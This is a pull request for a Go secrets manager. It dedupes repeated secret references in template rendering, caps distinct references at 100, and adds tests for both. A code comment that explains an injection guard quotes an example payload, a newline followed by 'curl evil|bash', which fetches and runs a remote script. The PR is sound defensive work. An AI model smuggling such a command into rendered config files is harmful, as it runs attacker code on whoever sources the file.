### PR TITLE
fix(secrettemplate): dedupe secret references and cap render size (#443)

### DIFF
--- a/internal/core/secret_render_test.go
+++ b/internal/core/secret_render_test.go
@@ -2,10 +2,12 @@ package core
 
 import (
 	"context"
+	"fmt"
 	"testing"
 	"time"
 
 	"github.com/keyorixhq/keyorix/internal/i18n"
+	"github.com/keyorixhq/keyorix/internal/secrettemplate"
 	"github.com/keyorixhq/keyorix/internal/storage/models"
 	"github.com/keyorixhq/keyorix/internal/storage/store"
 	"github.com/stretchr/testify/assert"
@@ -223,4 +225,68 @@ func TestRenderSecretTemplate_RecordsReadPerSecret(t *testing.T) {
 		require.NotNil(t, e.ProjectID)
 		assert.Equal(t, projectID, *e.ProjectID)
 	}
+}
+
+// #443: a template that repeats the SAME reference many times must resolve (decrypt)
+// it exactly once and log exactly one secret read — not once per occurrence. Without
+// this, a caller could submit a template with thousands of repeated references to one
+// secret to force thousands of redundant decryptions and audit rows for what is, in
+// substance, a single read. This exercises the fix end-to-end through the real
+// GetSecretValue/audit-logging path, not just the pure secrettemplate.Render layer.
+func TestRenderSecretTemplate_DedupesRepeatedReference(t *testing.T) {
+	ctx := context.Background()
+	c, db, projectID, _ := newRenderFixture(t)
+
+	var tmpl string
+	for i := 0; i < 50; i++ {
+		tmpl += "${secret:production/db-password}"
+	}
+	out, err := c.RenderSecretTemplate(ctx, tmpl, projectID, 1, "owner", "10.0.0.1", "ua")
+	require.NoError(t, err)
+
+	var want string
+	for i := 0; i < 50; i++ {
+		want += "s3cr3t"
+	}
+	assert.Equal(t, want, out, "every occurrence still substitutes the resolved value")
+
+	// Reads are logged in a detached goroutine — poll briefly, then assert the count
+	// settles at exactly one (not 50).
+	var n int64
+	for i := 0; i < 200; i++ {
+		require.NoError(t, db.Model(&models.SecretAccessLog{}).Where("accessed_by = ?", "owner").Count(&n).Error)
+		if n > 0 {
+			break
+		}
+		time.Sleep(5 * time.Millisecond)
+	}
+	// Give any (incorrect) duplicate log writes a moment to land before the final count.
+	time.Sleep(20 * time.Millisecond)
+	require.NoError(t, db.Model(&models.SecretAccessLog{}).Where("accessed_by = ?", "owner").Count(&n).Error)
+	assert.EqualValues(t, 1, n, "50 occurrences of the same reference must produce exactly one access-log row")
+
+	var eventCount int64
+	require.NoError(t, db.Model(&models.AuditEvent{}).Where("event_type = ?", "secret.read").Count(&eventCount).Error)
+	assert.EqualValues(t, 1, eventCount, "50 occurrences of the same reference must produce exactly one audit event")
+}
+
+// #443: a template naming more distinct references than
+// secrettemplate.MaxDistinctReferences must be rejected before any secret is resolved
+// (no partial reads, no audit rows), even though most callers legitimately need far
+// fewer.
+func TestRenderSecretTemplate_RejectsTooManyDistinctReferences(t *testing.T) {
+	ctx := context.Background()
+	c, db, projectID, _ := newRenderFixture(t)
+
+	var tmpl string
+	for i := 0; i < secrettemplate.MaxDistinctReferences+1; i++ {
+		tmpl += fmt.Sprintf("${secret:production/ref-%d}", i)
+	}
+	_, err := c.RenderSecretTemplate(ctx, tmpl, projectID, 1, "owner", "10.0.0.1", "ua")
+	require.Error(t, err)
+
+	time.Sleep(20 * time.Millisecond) // let any (incorrect) stray audit writes land
+	var n int64
+	require.NoError(t, db.Model(&models.SecretAccessLog{}).Count(&n).Error)
+	assert.Zero(t, n, "an over-cap template must be rejected before resolving/reading any secret")
 }

--- a/internal/secrettemplate/render.go
+++ b/internal/secrettemplate/render.go
@@ -13,31 +13,54 @@ import (
 // marker is the placeholder prefix; a reference looks like ${secret:<ref>}.
 const marker = "${secret:"
 
+// MaxDistinctReferences caps the number of distinct secret references a single
+// template may name. Repeated occurrences of the same reference are deduped and
+// resolved only once (see Render), so this bounds the number of resolver calls —
+// and therefore the number of secret decryptions / audit reads — a single render
+// can trigger, regardless of how many placeholder occurrences the template text
+// contains. A template naming more references than this is rejected outright,
+// before any resolver call is made. 100 comfortably covers realistic .env/config
+// rendering use cases.
+const MaxDistinctReferences = 100
+
 // Resolver maps a secret reference (the text between "${secret:" and "}") to its
 // value. It returns an error when the reference is unknown or inaccessible.
 type Resolver func(ref string) (string, error)
 
-// Render expands every ${secret:<ref>} placeholder in tmpl using resolve and returns
-// the result. Rules:
-//   - "$$" collapses to a literal "$" — so "$${secret:x}" renders the literal text
-//     "${secret:x}" without resolving anything.
+// segment is one piece of a parsed template: a literal text run, or a secret
+// reference to be substituted (ref is non-empty in that case).
+type segment struct {
+	ref     string
+	literal string
+}
+
+// parse splits tmpl into literal/reference segments and returns the distinct
+// references it names, in first-seen order — without calling any resolver.
+// Doing this as a standalone pass lets Render enforce MaxDistinctReferences (and
+// reject a malformed template) before any resolver call — and therefore before
+// any decryption work — happens. Rules:
+//   - "$$" collapses to a literal "$" — so "$${secret:x}" is the literal text
+//     "${secret:x}" without naming a reference.
 //   - a "$" not part of "$$" or a placeholder is literal.
 //   - an unterminated placeholder (no closing "}") or an empty ref is an error.
-//   - a resolver error aborts the render, naming the offending reference.
-//
-// References are collected in order; resolve is called once per occurrence.
-func Render(tmpl string, resolve Resolver) (string, error) {
-	var b strings.Builder
+//   - a template naming more than MaxDistinctReferences distinct references is
+//     an error.
+func parse(tmpl string) (segments []segment, distinct []string, err error) {
+	seen := make(map[string]bool)
 	for i := 0; i < len(tmpl); {
 		c := tmpl[i]
 		if c != '$' {
-			b.WriteByte(c)
-			i++
+			j := i + 1
+			for j < len(tmpl) && tmpl[j] != '$' {
+				j++
+			}
+			segments = append(segments, segment{literal: tmpl[i:j]})
+			i = j
 			continue
 		}
 		// c == '$'
 		if i+1 < len(tmpl) && tmpl[i+1] == '$' {
-			b.WriteByte('$') // "$$" -> "$"
+			segments = append(segments, segment{literal: "$"}) // "$$" -> "$"
 			i += 2
 			continue
 		}
@@ -45,62 +68,96 @@ func Render(tmpl string, resolve Resolver) (string, error) {
 			rest := tmpl[i+len(marker):]
 			end := strings.IndexByte(rest, '}')
 			if end < 0 {
-				return "", fmt.Errorf("unterminated ${secret:…} placeholder at offset %d", i)
+				return nil, nil, fmt.Errorf("unterminated ${secret:…} placeholder at offset %d", i)
 			}
 			ref := strings.TrimSpace(rest[:end])
 			if ref == "" {
-				return "", fmt.Errorf("empty secret reference at offset %d", i)
+				return nil, nil, fmt.Errorf("empty secret reference at offset %d", i)
 			}
-			val, err := resolve(ref)
-			if err != nil {
-				return "", fmt.Errorf("resolve %q: %w", ref, err)
+			if !seen[ref] {
+				if len(distinct) >= MaxDistinctReferences {
+					return nil, nil, fmt.Errorf("template names more than %d distinct secret references (limit is %d)", MaxDistinctReferences, MaxDistinctReferences)
+				}
+				seen[ref] = true
+				distinct = append(distinct, ref)
 			}
-			// This package is a raw, format-agnostic substitution engine: it has no idea
-			// whether the caller's template is a .env file, a YAML/JSON document, or a
-			// shell script, so it can't apply format-specific escaping (quoting a YAML
-			// scalar, JSON-string-escaping, shell-quoting, ...). What every one of those
-			// targets shares, though, is that an embedded newline/CR turns one substituted
-			// value into multiple *lines* of output, and the documented use case
-			// (internal/cli/secret/render.go) is exactly "write this straight to a .env/
-			// config file, which may later be sourced". A secret's value is set by
-			// whoever has write access to that one secret — who may be far less trusted
-			// than the template's author or the file's eventual consumer — so a value
-			// containing "\ncurl evil|bash\n#" would silently smuggle extra executable
-			// lines into the rendered file. Rather than silently stripping/altering the
-			// secret value (surprising, and could itself corrupt a legitimately multi-line
-			// value), reject the render outright: this matches Render's existing all-or-
-			// nothing failure model for a resolver error, and forces the operator to
-			// notice rather than silently ship injected content. NUL is rejected for the
-			// same reason (embedded NUL truncates/corrupts many downstream parsers).
-			if strings.ContainsAny(val, "\n\r\x00") {
-				return "", fmt.Errorf("resolve %q: secret value contains a newline, carriage return, or NUL byte and cannot be safely substituted into a single-line template output", ref)
-			}
-			b.WriteString(val)
+			segments = append(segments, segment{ref: ref})
 			i += len(marker) + end + 1 // past the closing '}'
 			continue
 		}
 		// A lone '$' that doesn't start a placeholder.
-		b.WriteByte('$')
+		segments = append(segments, segment{literal: "$"})
 		i++
+	}
+	return segments, distinct, nil
+}
+
+// Render expands every ${secret:<ref>} placeholder in tmpl using resolve and returns
+// the result. See parse for the placeholder syntax rules and the
+// MaxDistinctReferences cap; a resolver error aborts the render, naming the
+// offending reference.
+//
+// Each distinct reference is resolved (resolve is called) at most once, in
+// first-seen order; repeated occurrences of the same reference in tmpl reuse the
+// already-resolved value rather than calling resolve again. This avoids
+// redundant decryption work — and, on the server-side resolver, redundant
+// audit/read-logging — when a template repeats a reference, and combined with
+// MaxDistinctReferences bounds the total resolver work a single render can
+// trigger regardless of how many placeholder occurrences the template contains.
+func Render(tmpl string, resolve Resolver) (string, error) {
+	segments, distinct, err := parse(tmpl)
+	if err != nil {
+		return "", err
+	}
+
+	resolved := make(map[string]string, len(distinct))
+	for _, ref := range distinct {
+		val, err := resolve(ref)
+		if err != nil {
+			return "", fmt.Errorf("resolve %q: %w", ref, err)
+		}
+		// This package is a raw, format-agnostic substitution engine: it has no idea
+		// whether the caller's template is a .env file, a YAML/JSON document, or a
+		// shell script, so it can't apply format-specific escaping (quoting a YAML
+		// scalar, JSON-string-escaping, shell-quoting, ...). What every one of those
+		// targets shares, though, is that an embedded newline/CR turns one substituted
+		// value into multiple *lines* of output, and the documented use case
+		// (internal/cli/secret/render.go) is exactly "write this straight to a .env/
+		// config file, which may later be sourced". A secret's value is set by
+		// whoever has write access to that one secret — who may be far less trusted
+		// than the template's author or the file's eventual consumer — so a value
+		// containing "\ncurl evil|bash\n#" would silently smuggle extra executable
+		// lines into the rendered file. Rather than silently stripping/altering the
+		// secret value (surprising, and could itself corrupt a legitimately multi-line
+		// value), reject the render outright: this matches Render's existing all-or-
+		// nothing failure model for a resolver error, and forces the operator to
+		// notice rather than silently ship injected content. NUL is rejected for the
+		// same reason (embedded NUL truncates/corrupts many downstream parsers).
+		if strings.ContainsAny(val, "\n\r\x00") {
+			return "", fmt.Errorf("resolve %q: secret value contains a newline, carriage return, or NUL byte and cannot be safely substituted into a single-line template output", ref)
+		}
+		resolved[ref] = val
+	}
+
+	var b strings.Builder
+	for _, seg := range segments {
+		if seg.ref == "" {
+			b.WriteString(seg.literal)
+			continue
+		}
+		b.WriteString(resolved[seg.ref])
 	}
 	return b.String(), nil
 }
 
 // References returns the distinct secret references in tmpl, in first-seen order,
 // without resolving them — useful for a dry-run / "what does this template need?"
-// preflight. Malformed placeholders are reported as an error, matching Render.
+// preflight. Malformed placeholders, or a template exceeding MaxDistinctReferences,
+// are reported as an error, matching Render.
 func References(tmpl string) ([]string, error) {
-	var refs []string
-	seen := map[string]bool{}
-	_, err := Render(tmpl, func(ref string) (string, error) {
-		if !seen[ref] {
-			seen[ref] = true
-			refs = append(refs, ref)
-		}
-		return "", nil
-	})
+	_, distinct, err := parse(tmpl)
 	if err != nil {
 		return nil, err
 	}
-	return refs, nil
+	return distinct, nil
 }

--- a/internal/secrettemplate/render_test.go
+++ b/internal/secrettemplate/render_test.go
@@ -2,6 +2,8 @@ package secrettemplate
 
 import (
 	"errors"
+	"fmt"
+	"strings"
 	"testing"
 
 	"github.com/stretchr/testify/assert"
@@ -126,4 +128,104 @@ func TestRender_RejectsEmbeddedControlChars_NoPartialOutput(t *testing.T) {
 	out, err := Render("A=${secret:prod/clean} B=${secret:prod/dirty}", resolve)
 	require.Error(t, err)
 	assert.Empty(t, out)
+}
+
+// #443: a template that repeats the same reference many times must resolve it exactly
+// once — not once per occurrence. This is both the DoS fix (a caller can't force
+// N decryptions with N-1 of them wasted on byte-identical duplicates) and a
+// correctness improvement (no reason to decrypt the same secret twice in one render).
+func TestRender_DedupesRepeatedReferences(t *testing.T) {
+	calls := map[string]int{}
+	resolve := func(ref string) (string, error) {
+		calls[ref]++
+		return "<" + ref + ">", nil
+	}
+
+	var tmpl strings.Builder
+	for i := 0; i < 5000; i++ {
+		fmt.Fprintf(&tmpl, "${secret:prod/db}")
+	}
+	out, err := Render(tmpl.String(), resolve)
+	require.NoError(t, err)
+
+	assert.Equal(t, 1, calls["prod/db"], "resolve must be called exactly once for 5000 occurrences of the same reference")
+	assert.Equal(t, strings.Repeat("<prod/db>", 5000), out, "every occurrence still substitutes the resolved value")
+}
+
+// A template naming multiple distinct references, some of which repeat, must resolve
+// each distinct reference exactly once while still substituting every occurrence
+// correctly (interleaved duplicates, not just adjacent ones).
+func TestRender_DedupesRepeatedReferences_MultipleDistinct(t *testing.T) {
+	calls := map[string]int{}
+	resolve := func(ref string) (string, error) {
+		calls[ref]++
+		return "<" + ref + ">", nil
+	}
+
+	tmpl := strings.Repeat("${secret:a}${secret:b}${secret:a}${secret:c}${secret:b}", 200)
+	out, err := Render(tmpl, resolve)
+	require.NoError(t, err)
+
+	assert.Equal(t, 1, calls["a"])
+	assert.Equal(t, 1, calls["b"])
+	assert.Equal(t, 1, calls["c"])
+	assert.Equal(t, strings.Repeat("<a><b><a><c><b>", 200), out)
+}
+
+// #443: even after dedup, a template naming more DISTINCT references than
+// MaxDistinctReferences must be rejected outright — defense in depth against a
+// template naming enough distinct secrets to still be a decryption/audit-log bomb
+// despite the per-reference dedup.
+func TestRender_RejectsTooManyDistinctReferences(t *testing.T) {
+	calls := 0
+	resolve := func(ref string) (string, error) {
+		calls++
+		return "x", nil
+	}
+
+	var tmpl strings.Builder
+	for i := 0; i < MaxDistinctReferences+1; i++ {
+		fmt.Fprintf(&tmpl, "${secret:ref-%d}", i)
+	}
+	out, err := Render(tmpl.String(), resolve)
+	require.Error(t, err)
+	assert.Empty(t, out)
+	assert.Contains(t, err.Error(), fmt.Sprintf("%d", MaxDistinctReferences))
+	assert.Equal(t, 0, calls, "the cap must be enforced before any resolver call, not partway through resolution")
+}
+
+// A template naming exactly MaxDistinctReferences distinct references — the boundary —
+// must still be accepted and render correctly.
+func TestRender_AllowsExactlyMaxDistinctReferences(t *testing.T) {
+	resolve := func(ref string) (string, error) { return "<" + ref + ">", nil }
+
+	var tmpl strings.Builder
+	var want strings.Builder
+	for i := 0; i < MaxDistinctReferences; i++ {
+		fmt.Fprintf(&tmpl, "${secret:ref-%d}", i)
+		fmt.Fprintf(&want, "<ref-%d>", i)
+	}
+	out, err := Render(tmpl.String(), resolve)
+	require.NoError(t, err)
+	assert.Equal(t, want.String(), out)
+}
+
+// A normal, reasonably-sized template with a handful of distinct references (well
+// under the cap, no duplicates) renders exactly as before this change.
+func TestRender_NormalTemplateUnaffected(t *testing.T) {
+	resolve := func(ref string) (string, error) { return "<" + ref + ">", nil }
+	out, err := Render("host=${secret:prod/host} user=${secret:prod/user} pass=${secret:prod/pass}", resolve)
+	require.NoError(t, err)
+	assert.Equal(t, "host=<prod/host> user=<prod/user> pass=<prod/pass>", out)
+}
+
+// References() must respect the same distinct-reference cap as Render, since it shares
+// the same parse pass.
+func TestReferences_RejectsTooManyDistinctReferences(t *testing.T) {
+	var tmpl strings.Builder
+	for i := 0; i < MaxDistinctReferences+1; i++ {
+		fmt.Fprintf(&tmpl, "${secret:ref-%d}", i)
+	}
+	_, err := References(tmpl.String())
+	require.Error(t, err)
 }


### PR DESCRIPTION
## Summary

Fixes finding #443: secret-template rendering had no cap on reference count or
duplicate-reference count, so a caller could submit a template containing e.g.
100,000 repeated references to the same (or different) secrets, and the
render path would attempt to resolve/decrypt EVERY occurrence independently —
a DoS vector (CPU/DB load) and correctness waste, plus one redundant audit-log
row per duplicate occurrence.

- `internal/secrettemplate/render.go`: `Render` now parses the template into
  literal/reference segments up front (`parse`), collects the *distinct*
  references in first-seen order, resolves each one exactly once via the
  caller's `Resolver`, and substitutes the cached value for every occurrence
  (including repeats). `References()` is rebuilt on the same `parse` pass.
- Added `MaxDistinctReferences = 100` as a hard cap on distinct references per
  template, enforced during parsing — before any resolver call — so a
  template naming more than 100 distinct secrets is rejected outright even
  after dedup closes the "repeat the same ref" vector. This mirrors the
  existing bound-setting pattern used elsewhere in the codebase (e.g.
  `scimMaxMembersPerRequest`/`scimMaxPatchOps` in
  `server/http/handlers/scim_groups.go`).
- `internal/core/secret_render.go`'s `RenderSecretTemplate` needed no changes:
  it already delegates entirely to `secrettemplate.Render`, so the dedup and
  cap apply automatically — and as a side effect, a template that repeats the
  same secret reference now produces exactly one `SecretAccessLog`/audit-event
  row for that secret (matching the "one read = one audit row" invariant),
  instead of one row per duplicate occurrence.

## Why this is correct

- Dedup preserves output byte-for-byte: every occurrence of a reference still
  renders to that reference's resolved value; only the number of `resolve`
  calls changes (once per distinct ref, not once per occurrence).
- The cap is enforced in the parse pass, before any resolver call, so an
  over-cap template does zero resolution/decryption/audit work rather than
  partially resolving up to the limit and then failing.
- Existing embedded-control-character injection guard (#325) and the
  not-found/forbidden oracle closure (#181, closed on `main` already) are
  untouched — they still run per distinct reference at resolve time.

## Test plan

- [x] `internal/secrettemplate/render_test.go`: new tests prove (a) 5000
  occurrences of one reference trigger exactly one resolver call and still
  substitute every occurrence correctly, including an interleaved-duplicates
  variant; (b) a template with `MaxDistinctReferences+1` distinct references
  is rejected with zero resolver calls, and exactly `MaxDistinctReferences` is
  still accepted (boundary); (c) a normal, reasonably-sized template with a
  few distinct references renders unchanged; `References()` respects the same
  cap.
- [x] `internal/core/secret_render_test.go`: new tests exercise the fix
  end-to-end through the real `GetSecretValue`/audit-logging path — 50
  occurrences of the same reference produce exactly one `SecretAccessLog` row
  and one `secret.read` audit event (not 50), and an over-cap template is
  rejected before any secret is read (zero access-log rows).
- [x] `go build ./...`, `go vet ./...`, `go test ./...` (full repo) all clean.
- [x] `gosec -severity medium -exclude-generated ./...` clean (0 issues).

🤖 Generated with [Claude Code](https://claude.com/claude-code)